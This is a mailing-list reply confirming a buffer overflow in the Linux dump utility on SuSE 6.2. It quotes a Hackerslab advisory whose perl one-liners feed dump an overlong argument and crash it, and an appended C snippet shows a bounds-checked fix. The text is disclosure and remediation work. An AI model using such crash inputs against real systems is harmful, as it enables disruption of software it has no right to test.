Hi,

Confirmed this on SuSE 6.2. The magic number of bytes is 347. Dump is not su/gid so this seems to be more of an annoyance than a security issue for SuSE boxen (not sure of others).

-HD

"김용준 KimYongJun (99졸업)" wrote:
>
> [ Hackerslab bug_paper ] Linux dump buffer overflow
>
> File : /sbin/dump
>
> SYSTEM : Linux
>
> INFO :
>
> The problem occurs when it gets the argument.
> It accepts the argument without checking out its length, and this causes the problem.
>
> It seems that this vulnerability also applies to RedHat Linux 6.2beta,
> the latest version.
>
> [loveyou@loveyou SOURCES]$ dump -f a `perl -e 'print "x" x 556'`
> DUMP: Date of this level 0 dump: Mon Feb 28 14:45:01 2000
> DUMP: Date of last level dump: the epoch
> DUMP: Dumping xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx to a
> xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx: 파일 이름이 너무 깁니다 while opening filesystem
> DUMP: SIGSEGV: ABORTING!
> Segmentation fault
>
> [loveyou@loveyou SOURCES]$ dump -f a `perl -e 'print "loveyou" x 556'`
> DUMP: SIGSEGV: ABORTING!
> Segmentation fault <= occur ctime4()
>
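The missing length check described in the quoted report, shown from the fixing side as an added example (it is not part of either message and is not dump's source code). `copy_arg_checked` and `DISK_BUF_SIZE` are hypothetical names, and the 256-byte size is an assumption, since the thread does not give the real buffer size.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical fixed-size destination; the real size in dump is not stated. */
#define DISK_BUF_SIZE 256

/*
 * Copy a command-line argument into a fixed-size buffer only if it fits,
 * terminating NUL included. On failure dst holds an empty string and a
 * negative errno value is returned; the argument is never truncated silently.
 */
int copy_arg_checked(char *dst, size_t dstsz, const char *arg)
{
    const char *end;

    if (dst == NULL || dstsz == 0)
        return -EINVAL;
    dst[0] = '\0';
    if (arg == NULL)
        return -EINVAL;

    /* Look for the terminator within the first dstsz bytes only. */
    end = memchr(arg, '\0', dstsz);
    if (end == NULL)                 /* no NUL in range: argument too long */
        return -ENAMETOOLONG;

    memcpy(dst, arg, (size_t)(end - arg) + 1);  /* fits, NUL included */
    return 0;
}

int main(int argc, char **argv)
{
    char disk[DISK_BUF_SIZE];
    int rc;

    if (argc < 2) {
        fprintf(stderr, "usage: %s filesystem\n", argv[0]);
        return 2;
    }
    rc = copy_arg_checked(disk, sizeof(disk), argv[1]);
    if (rc != 0) {
        fprintf(stderr, "argument rejected: %s\n", strerror(-rc));
        return 1;
    }
    printf("accepted: %s\n", disk);
    return 0;
}
```

Rejecting the oversized argument up front, instead of truncating it, gives the caller a clean error path before any fixed-size buffer is written.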